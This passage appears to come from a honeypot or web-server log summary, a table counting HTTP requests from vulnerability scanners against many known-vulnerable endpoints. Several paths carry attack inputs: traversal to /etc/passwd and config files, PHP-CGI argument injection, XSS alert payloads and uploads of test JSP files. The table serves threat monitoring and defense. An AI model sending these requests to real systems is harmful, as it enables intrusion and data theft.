HTTP/1.1 |
2 | POST | /http[:]//13[.]67[.]44[.]234/xmlrpc |
HTTP/1.1 |
1 | POST | /http[:]//13[.]67[.]44[.]234:7272/xmlrpc |
HTTP/1.1 |
1 | POST | /http[:]//13[.]67[.]44[.]234:8282/xmlrpc |
HTTP/1.1 |
1 | POST | /http[:]//13[.]67[.]44[.]234:9292/xmlrpc |
HTTP/1.1 |
2 | POST | /hub/login?next |
HTTP/1.1 |
1 | POST | /hybridity/api/sessions |
HTTP/1.1 |
1 | POST | /ibmmq/console/j_security_check |
HTTP/1.1 |
1 | POST | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
HTTP/1.1 |
1 | POST | /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd |
HTTP/1.1 |
1 | POST | /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input |
HTTP/1.1 |
2 | POST | /index.php?a=attemptLogin&m=login |
HTTP/1.1 |
1 | POST | /index.php?action=login.index |
HTTP/1.1 |
2 | POST | /index.php?do=orgtree&mod=system&op=orgtree |
HTTP/1.1 |
1 | POST | /index.php?f=login_save&m=member |
HTTP/1.1 |
1 | POST | /index.php?q=result&searchfor=advancesearch |
HTTP/1.1 |
1 | POST | /index.php?s=/home/page/uploadImg |
HTTP/1.1 |
1 | POST | /index.php?s=captcha |
HTTP/1.1 |
4 | POST | /index.php |
HTTP/1.1 |
1 | POST | /index/login.cgi |
HTTP/1.1 |
1 | POST | /integration/saveGangster.action |
HTTP/1.1 |
1 | POST | /inter/ajax.php?cmd=get_user_login_cmd |
HTTP/1.1 |
1 | POST | /invoker/JMXInvokerServlet/ |
HTTP/1.1 |
1 | POST | /j_security_check |
HTTP/1.1 |
1 | POST | /j_spring_security_check |
HTTP/1.1 |
1 | POST | /jolokia/ |
HTTP/1.1 |
2 | POST | /jolokia/read/getDiagnosticOptions |
HTTP/1.1 |
1 | POST | /json-rpc/ |
HTTP/1.1 |
1 | POST | /kindeditor/php/demo.php |
HTTP/1.1 |
10 | POST | /libs/granite/core/content/login.html/j_security_check |
HTTP/1.1 |
1 | POST | /login.action |
HTTP/1.1 |
1 | POST | /login.cgi |
HTTP/1.1 |
1 | POST | /login.html |
HTTP/1.1 |
1 | POST | /login.php?action=login&type=admin |
HTTP/1.1 |
3 | POST | /login.php |
HTTP/1.1 |
1 | POST | /login/ |
HTTP/1.1 |
1 | POST | /login/dologin |
HTTP/1.1 |
1 | POST | /login/system |
HTTP/1.1 |
1 | POST | /login/userverify.cgi |
HTTP/1.1 |
1 | POST | /login/verify |
HTTP/1.1 |
7 | POST | /login |
HTTP/1.1 |
2 | POST | /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D |
HTTP/1.1 |
1 | POST | /lucee/admin/imgProcess.cfm?file=/whatever |
HTTP/1.1 |
1 | POST | /lumis/portal/controller/xml/PageControllerXml.jsp |
HTTP/1.1 |
1 | POST | /magmi/web/magmi_run.php |
HTTP/1.1 |
1 | POST | /mailingupgrade.php |
HTTP/1.1 |
1 | POST | /main.ehp |
HTTP/1.1 |
1 | POST | /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags |
HTTP/1.1 |
1 | POST | /maint/index.php?packages |
HTTP/1.1 |
1 | POST | /manager/login.php |
HTTP/1.1 |
1 | POST | /meaweb/os/mxperson |
HTTP/1.1 |
2 | POST | /menu/stapp |
HTTP/1.1 |
2 | POST | /mgmt/shared/authn/login |
HTTP/1.1 |
1 | POST | /mifs/.;/services/LogService |
HTTP/1.1 |
1 | POST | /mifs/j_spring_security_check |
HTTP/1.1 |
1 | POST | /minio/webrpc |
HTTP/1.1 |
3 | POST | /module/ |
HTTP/1.1 |
1 | POST | /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo |
HTTP/1.1 |
3 | POST | /oauth/token |
HTTP/1.1 |
2 | POST | /ocpu/library/base/R/do.call/json |
HTTP/1.1 |
1 | POST | /op/op.Login.php |
HTTP/1.1 |
1 | POST | /opensis/index.php |
HTTP/1.1 |
1 | POST | /os/mxperson |
HTTP/1.1 |
2 | POST | /page/exportImport/uploadOperation.jsp |
HTTP/1.1 |
1 | POST | /pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
2 | POST | /pages/createpage-entervariables.action |
HTTP/1.1 |
1 | POST | /pages/createpage.action?spaceKey=myproj |
HTTP/1.1 |
2 | POST | /pages/doenterpagevariables.action |
HTTP/1.1 |
2 | POST | /pages/templates2/viewpagetemplate.action |
HTTP/1.1 |
2 | POST | /password_change.cgi |
HTTP/1.1 |
2 | POST | /pentaho/j_spring_security_check |
HTTP/1.1 |
1 | POST | /php/ping.php |
HTTP/1.1 |
2 | POST | /php/query.php |
HTTP/1.1 |
2 | POST | /php/upload.php |
HTTP/1.1 |
1 | POST | /plugin/add |
HTTP/1.1 |
1 | POST | /plugin/customMethod |
HTTP/1.1 |
2 | POST | /plugins/servlet/gadgets/makeRequest |
HTTP/1.1 |
1 | POST | /plugins/servlet/groupexportforjira/admin/json |
HTTP/1.1 |
1 | POST | /public/checklogin.htm |
HTTP/1.1 |
2 | POST | /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php |
HTTP/1.1 |
1 | POST | /query-api |
HTTP/1.1 |
1 | POST | /query-laravel |
HTTP/1.1 |
1 | POST | /query |
HTTP/1.1 |
1 | POST | /rails/actions?action=Run%20pending%20migrations&error=ActiveRecord::PendingMigrationError&location=%0djavascript:alert(1)//%0aaaaaa |
HTTP/1.1 |
1 | POST | /redfish/v1/SessionService/Sessions/ |
HTTP/1.1 |
1 | POST | /rest/issueNav/1/issueTable |
HTTP/1.1 |
2 | POST | /rest/tinymce/1/macro/preview |
HTTP/1.1 |
1 | POST | /reviewInput.php?pid=1 |
HTTP/1.1 |
1 | POST | /s/aura |
HTTP/1.1 |
1 | POST | /s/sfsites/aura |
HTTP/1.1 |
2 | POST | /scgi-bin/platform.cgi |
HTTP/1.1 |
1 | POST | /scripts/setup.php |
HTTP/1.1 |
2 | POST | /search.php?searchtype=5 |
HTTP/1.1 |
1 | POST | /search/ |
HTTP/1.1 |
2 | POST | /search |
HTTP/1.1 |
1 | POST | /secure/Signup.jspa |
HTTP/1.1 |
2 | POST | /seeyon/htmlofficeservlet |
HTTP/1.1 |
1 | POST | /seeyon/thirdpartyController.do |
HTTP/1.1 |
1 | POST | /seo/seopanel/login.php?sec=forgot |
HTTP/1.1 |
1 | POST | /server/index.php?s=/api/user/login |
HTTP/1.1 |
2 | POST | /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd |
HTTP/1.1 |
1 | POST | /service/extension/backup/mboximport?account-name=admin&append=1&no-switch=1&ow=2 |
HTTP/1.1 |
1 | POST | /service/rapture/session |
HTTP/1.1 |
1 | POST | /servicedesk/customer/user/signup |
HTTP/1.1 |
1 | POST | /session/create |
HTTP/1.1 |
1 | POST | /sfsites/aura |
HTTP/1.1 |
1 | POST | /share/page/dologin |
HTTP/1.1 |
1 | POST | /submitLogin |
HTTP/1.1 |
1 | POST | /subscriptions |
HTTP/1.1 |
1 | POST | /suite-api/api/auth/token/acquire |
HTTP/1.1 |
1 | POST | /sws/app/gnb/login/login.jsp |
HTTP/1.1 |
1 | POST | /sys/ui/extend/varkind/custom.jsp |
HTTP/1.1 |
1 | POST | /sysShell |
HTTP/1.1 |
1 | POST | /system/sharedir.php |
HTTP/1.1 |
1 | POST | /template/custom/content-editor |
HTTP/1.1 |
2 | POST | /templates/default/html/windows/right.php |
HTTP/1.1 |
2 | POST | /templates/editor-preload-container |
HTTP/1.1 |
1 | POST | /thruk/cgi-bin/login.cgi |
HTTP/1.1 |
1 | POST | /timesheet/login.php |
HTTP/1.1 |
1 | POST | /tmui/locallb/workspace/fileSave.jsp |
HTTP/1.1 |
1 | POST | /tmui/locallb/workspace/tmshCmd.jsp |
HTTP/1.1 |
4 | POST | /tools.cgi |
HTTP/1.1 |
2 | POST | /ubus/ |
HTTP/1.1 |
1 | POST | /ui/api/v1/ui/auth/login |
HTTP/1.1 |
2 | POST | /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData |
HTTP/1.1 |
1 | POST | /ui/login.action |
HTTP/1.1 |
2 | POST | /upload/UploadResourcePic.ashx?ResourceID=8382 |
HTTP/1.1 |
1 | POST | /user/login/login |
HTTP/1.1 |
1 | POST | /user/register?_wrapper_format=drupal_ajax&ajax_form=1&element_parents=account/mail/%23value |
HTTP/1.1 |
1 | POST | /userportal/Controller?datagrid=179&json={\"%f0%9f%a6%9e\":\"test\"}&mode=8700&operation=1 |
HTTP/1.1 |
1 | POST | /users/login |
HTTP/1.1 |
1 | POST | /users/user-dark-features |
HTTP/1.1 |
1 | POST | /v1/graphiql.min.css |
HTTP/1.1 |
1 | POST | /v1/graphiql.min.js |
HTTP/1.1 |
1 | POST | /v1/graphql-explorer |
HTTP/1.1 |
1 | POST | /v1/graphql/schema.xml |
HTTP/1.1 |
1 | POST | /v1/query |
HTTP/1.1 |
1 | POST | /v2/altair |
HTTP/1.1 |
2 | POST | /v2/api/product/manger/getInfo |
HTTP/1.1 |
1 | POST | /v2/query |
HTTP/1.1 |
1 | POST | /v3/api/graphql |
HTTP/1.1 |
1 | POST | /v3/graph |
HTTP/1.1 |
1 | POST | /v3/graphiql |
HTTP/1.1 |
1 | POST | /v3/graphql/schema.xml |
HTTP/1.1 |
1 | POST | /v3/playground |
HTTP/1.1 |
1 | POST | /v3 |
HTTP/1.1 |
1 | POST | /v4/graphiql.css |
HTTP/1.1 |
1 | POST | /v4/graphiql.php |
HTTP/1.1 |
1 | POST | /v4/graphiql/finland |
HTTP/1.1 |
1 | POST | /v4/graphql/console |
HTTP/1.1 |
1 | POST | /v4/graphql/schema.xml |
HTTP/1.1 |
1 | POST | /v4/playground |
HTTP/1.1 |
1 | POST | /var |
HTTP/1.1 |
2 | POST | /vendor/htmlawed/htmlawed/htmLawedTest.php |
HTTP/1.1 |
1 | POST | /versa/login |
HTTP/1.1 |
2 | POST | /viewlog.jsp |
HTTP/1.1 |
1 | POST | /web/guest/tw/websys/webArch/login.cgi |
HTTP/1.1 |
2 | POST | /webadm/?action=gragh&q=moni_detail.do |
HTTP/1.1 |
1 | POST | /webadmin/index.php |
HTTP/1.1 |
1 | POST | /webapi/auth |
HTTP/1.1 |
1 | POST | /website/blog/ |
HTTP/1.1 |
1 | POST | /webtools/control/SOAPService |
HTTP/1.1 |
2 | POST | /webtools/control/xmlrpc |
HTTP/1.1 |
1 | POST | /wiki/pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
1 | POST | /wiki/pages/createpage-entervariables.action |
HTTP/1.1 |
4 | POST | /wls-wsat/CoordinatorPortType |
HTTP/1.1 |
1 | POST | /wls-wsat/RegistrationRequesterPortType |
HTTP/1.1 |
1 | POST | /wp-admin/admin-ajax.php?action=action_name |
HTTP/1.1 |
1 | POST | /wp-admin/admin-ajax.php?action=check_country_selector |
HTTP/1.1 |
1 | POST | /wp-admin/admin-ajax.php?action=uploadFontIcon |
HTTP/1.1 |
2 | POST | /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option |
HTTP/1.1 |
17 | POST | /wp-admin/admin-ajax.php |
HTTP/1.1 |
1 | POST | /wp-admin/admin-post.php |
HTTP/1.1 |
1 | POST | /wp-admin/admin.php?page=html2wp-settings |
HTTP/1.1 |
1 | POST | /wp-admin/admin.php |
HTTP/1.1 |
1 | POST | /wp-admin/options-general.php?page=smartcode |
HTTP/1.1 |
1 | POST | /wp-comments-post.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php |
HTTP/1.1 |
2 | POST | /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php |
HTTP/1.1 |
2 | POST | /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/simple-file-list/ee-file-engine.php |
HTTP/1.1 |
2 | POST | /wp-content/plugins/simple-file-list/ee-upload-engine.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/wp-payeezy-pay/donate.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?control=upload&form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E |
HTTP/1.1 |
2 | POST | /wp-content/plugins/wsecure/wsecure-config.php |
HTTP/1.1 |
1 | POST | /wp-json/am-member/license |
HTTP/1.1 |
2 | POST | /wp-json/buddypress/v1/signup |
HTTP/1.1 |
3 | POST | /wp-json/click5_sitemap/API/update_html_option_AJAX |
HTTP/1.1 |
1 | POST | /wp-json/rsvpmaker/v1/stripesuccess/anythinghere |
HTTP/1.1 |
1 | POST | /wp-json/visualizer/v1/update-chart |
HTTP/1.1 |
1 | POST | /wp-json/visualizer/v1/upload-data |
HTTP/1.1 |
1 | POST | /wp-login.php?wlcms-action=preview |
HTTP/1.1 |
2 | POST | /wp-login.php |
HTTP/1.1 |
1 | POST | /ws/v1/cluster/apps/new-application |
HTTP/1.1 |
2 | POST | /xmlpserver/services/XMLPService |
HTTP/1.1 |
1 | POST | /xmlrpc.php |
HTTP/1.1 |
1 | POST | /xxl-job-admin/login |
HTTP/1.1 |
1 | POST | /zdm/cxf/login |
HTTP/1.1 |
1 | POST | /zentao/user-login.html |
HTTP/1.1 |
1 | POST | /zms/admin/index.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
1 | PURGE | / |
HTTP/1.1 |
1 | PUT | /2LM9cekPxFgZuPRbRrZ0KPhtnZp.json |
HTTP/1.1 |
1 | PUT | /_snapshot/test2 |
HTTP/1.1 |
1 | PUT | /api/v2/cmdb/system/admin/admin |
HTTP/1.1 |
1 | PUT | /fileserver/test.txt |
HTTP/1.1 |
1 | PUT | /poc.jsp/ |
HTTP/1.1 |
1 | PUT | /v1/agent/service/register |
HTTP/1.1 |
1 | PUT | /v1/kv/2LNn5bC184DIrROniVBP4UyCqcv |
HTTP/1.1 |
2 | PUT | /wp-content/plugins/w3-total-cache/pub/sns.php |
HTTP/1.1 |
1 | TRACE | / |
HTTP/1.1 |